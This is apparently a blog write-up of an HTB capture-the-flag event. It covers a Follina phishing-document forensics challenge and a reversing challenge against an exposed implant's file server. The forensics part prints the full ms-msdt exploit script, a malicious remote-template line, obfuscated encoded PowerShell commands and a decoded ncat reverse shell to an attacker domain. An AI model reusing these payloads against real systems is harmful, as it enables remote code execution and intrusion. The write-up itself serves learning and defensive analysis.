Despite the difficulty being rated “Beginner to Hard”, I found this CTF to be one of the hardest I have participated in. I think one of the biggest reasons was the lack of knowledge about the flags– in most CTFs you are limited to the artifacts provided, whereas with HTB, a lot of challenges were multi-faceted with lots of areas for partial flags to be. Regardless, it was a fun experience and definitely a great learning opportunity.

You are part of a multinational law enforcement operation called “ENIGMA” that targets malicious actors groups. The oldest running group called “Monkey Business” specialises in crypto-currency laundering, wire fraud, phishing campaigns, malware and ransomware strains. We need your help to take this group down. You’re our only hope to help us bring these criminals to the light of justice.

Forensics

Lina's Invitation

A CEO of a startup company reported that he could no longer access his Password Vault. It seems the password has been changed, but he states not to have done so. He reports receiving a birthday invitation to a Paintball party the last week. A few days later, his Italian friend told him that her email had been hacked and never sent out those birthday invites. He fears his lost password might have something to do with that birthday invite. Their SOC team confirmed their assumptions by admitting that this document escaped their attention and did not trigger any alert. Now they want us, ENIGMA, to analyze the provided network capture they took on the day and the document sent via his friends’ email.

Considering the prompt, it is safe to assume the Word document contained some sort of malicious payload, such as VBA macro or Fol"lina". I assumed it was the latter, just because network traffic was provided, but I probably should have started by checking the document for macros. Running it through oletools shows no VBA macros found. So, I then checked capture.pcapng for http traffic, as per the Follina exploit.

Filtering by http shows all HTTP related traffic. There’s some interesting traffic with the User-Agent: “Microsoft Office Word 2014” going to hxxp://www.windowsliveupdater.com/windowsupdate.html. When first solving the challenge, the website worked. It now redirects to a Rick-Roll, so traffic probably was not supposed to be allowed to begin with. However, you can also find the raw response in packet 48 of Wireshark. It’s pretty long, so I won’t include it here. It’s HTML encoded, but decoding it reveals an interesting <script>...</script> tag at the end:

<script>
    location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'YwA6AFwAXAB3AGkAbgBkAG8AdwBzAFwAXABzAHkAcwB0AGUAbQAzADIAXABcAGMAbQBkAC4AZQB4AGUAIAAvAGMAIABuAGMAYQB0ACAAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGwAaQB2AGUAdQBwAGQAYQB0AGUAcgAuAGMAbwBtACAANQA0ADcANgAgAC0AZQAgAGMAbQBkAC4AZQB4AGUAOwAgACQAcAB0ADEAPQBcACIASABUAEIAewBaAGUAcgAwAF8ARABhAHkAWgBfADQAUgBlAF8AQwAwAE8AbABfAEIAdQBUAF8AXAAiAA=='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe\"";
</script>

YwA6AFwAXAB3AGkAbgBkAG8AdwBzAFwAXABzAHkAcwB0AGUAbQAzADIAXABcAGMAbQBkAC4AZQB4AGUAIAAvAGMAIABuAGMAYQB0ACAAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGwAaQB2AGUAdQBwAGQAYQB0AGUAcgAuAGMAbwBtACAANQA0ADcANgAgAC0AZQAgAGMAbQBkAC4AZQB4AGUAOwAgACQAcAB0ADEAPQBcACIASABUAEIAewBaAGUAcgAwAF8ARABhAHkAWgBfADQAUgBlAF8AQwAwAE8AbABfAEIAdQBUAF8AXAAiAA== can be base64 decoded to reveal the PowerShell payload being invoked:

c:\\windows\\system32\\cmd.exe /c ncat www.windowsliveupdater.com 5476 -e cmd.exe;

The payload also contains the first part of the flag. This flag had me stumped, since I was originally browsing to the URL, and the script tags were in the page source. It didn’t cross my mind to check the page source, so shout out to @Jason Reyes for finding this flag.

This also helps us verify that it is indeed Follina:

Follina is a RCE vulnerability in the Microsoft Support Diagnostic Tool (MSDT) that allows attackers to subvert the ms-msdt protocol handler process. Attackers can use a specially crafted Word document that loads a malicious HTML file through the application’s remote template function

Follina uses a malicious remote template function. So, we should be able to check out the templates of birthday_invite.docx. Doc files act as archives, so it can be unzipped with unzip birthday_invite.docx. Looking through all the files, word/_rels/document.xml.rels stood out.

Relationship Id="rId1337" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="mhtml:http://windowsliveupdater.com:80/windowsupdate.html!x-usc:http://windowsliveupdater.com:80/windowsupdate.html" TargetMode="External"/>

And just a little bit further in the file is our second part of the flag.

Going back to the response from the /windowsupdate.html, there are 3 base64 encoded strings, which when decoded reveal a Caesar Cipher encoded string. This can further be decoded to reveal Invoke-MetasploitPayload.ps1. This mean it’s possible (and probable) that C2 was established.

Going back to the pcap, we can use the ssh filter, and will see SSH traffic between 192.168.74.128 (the victim) and 77.74.198.52 (The same server as /windowsupdate.html). Now, we can use ip.addr == 77.74.198.52 to see all traffic relating to that IP. Quickly looking at the TCP traffic, I noticed some of the packets have readable text in them. Primarily, the traffic from 192.168.74.146:49896 -> 77.74.198.52:5476. One last filter is all we need:

ip.addr == 77.74.198.52 && tcp.port == 49896

There’s a lot of C2 related traffic. References to WinPEAS, grabbing the user’s password, and PowerShell. All the PowerShell payloads are base64 encoded, so let’s decode them:

powershell.exe -enc IABJAGUAeAAgACgAIAAoACgAKAAiAHsAMgB9AHsANwB9AHsANgB9AHsANQB9AHsAOQB9AHsAMAB9AHsAOAB9AHsAMwB9AHsAMQAwAH0AewA0AH0AewAxAH0AIgAgAC0AZgAgACcAaAAnACwAJwAuAGUAeABlACcALAAnADwAIwB7ADAAJwAsACcAIQB9ACcALAAnAGUAYQBzACcALAAnAEEAJwAsACcAdAAzAD0AYgAzADMAbgBfAHAAJwAsACcAfQBwACcALAAnADMAZAAnACwAJwB0AGMAJwAsACcAIwA+ACAALgB7ADEAfQB3AGkAbgBwACcAKQApAC0AZgAgACAAWwBDAGgAYQByAF0AMwA2ACwAWwBDAGgAYQByAF0AOQAyACkAKQA=

 Iex ( ((("{2}{7}{6}{5}{9}{0}{8}{3}{10}{4}{1}" -f 'h','.exe','<#{0','!}','eas','A','t3=b33n_p','}p','3d','tc','#> .{1}winp'))-f  [Char]36,[Char]92))

There’s a bit of format-string obfuscation, which can be circumvented by running format string in PowerShell:

"{2}{7}{6}{5}{9}{0}{8}{3}{10}{4}{1}" -f 'h','.exe','<#{0','!}','eas','A','t3=b33n_p','}p','3d','tc','#> .{1}winp'

This reveals the third and final flag for the challenge.

Reversing

Breakout

The CCSS suffered a ransomware attack that compromised the Unique Digital Medical File (EDUS) and the National Prescriptions System for the public pharmacies. They’ve reported that their infrastructure has been compromised, and they cannot regain access. The APT left their implant interface exposed, though, and you’ll need to break into it and find out how it works. NOTE: This challenge is intended to be solved before ‘Breakin’.

Docker Container: 167.172.53.95:30191

All we were given for this challenge was a running Docker container. I first attempted to identify the port via nmap. The host was blocking pings, so I used sudo nmap -vv -A -PA30191 -p30191 to get around it.

PORT      STATE SERVICE REASON         VERSION
30191/tcp open  unknown syn-ack ttl 43
| fingerprint-strings:
|   FourOhFourRequest:
|     HTTP/1.1 404 Not Found
|     Content-Length: 18
|     Resource not found
|   GetRequest:
|     HTTP/1.1 200 OK
|     Content-Length: 515
|_    href="/bin">bin/</a><br/><a href="/bkd">bkd</a><br/><a href="/dev">dev/</a><br/><a href="/etc">etc/</a><br/><a href="/home">home/</a><br/><a href="/lib">lib/</a><br/><a href="/media">media/</a><br/><a href="/mnt">mnt/</a><br/><a href="/opt">opt/</a><br/><a href="/proc">proc/</a><br/><a href="/root">root/</a><br/><a href="/run">run/</a><br/><a href="/sbin">sbin/</a><br/><a href="/srv">srv/</a><br/><a href="/sys">sys/</a><br/><a href="/tmp">tmp/</a><br/><a href="/usr">usr/</a><br/><a href="/var">var/</a><br/>

This shows that it is a web server, so I browsed to it. Interestingly enough, it failed on Firefox. I had to resort to Safari to access the website. Regardless, the website was a Linux file system, that allowed me to browse the file system. I first went to /etc/passwd and /etc/shadow, but nothing of use there. I then noticed a bkd in the root directory, which I had never seen before. I downloaded the file and ran file bkd, which revealed it was a ELF 64bit executable.

Then, I opened the file in Cutter. I started with string analysis and found a refereence to htb{, so the string is in this file somewhere. I went to the function that contained the string, secretGet(), and viewed it in graph mode. This actually was all I needed to do in order to be able to find all parts of the flag.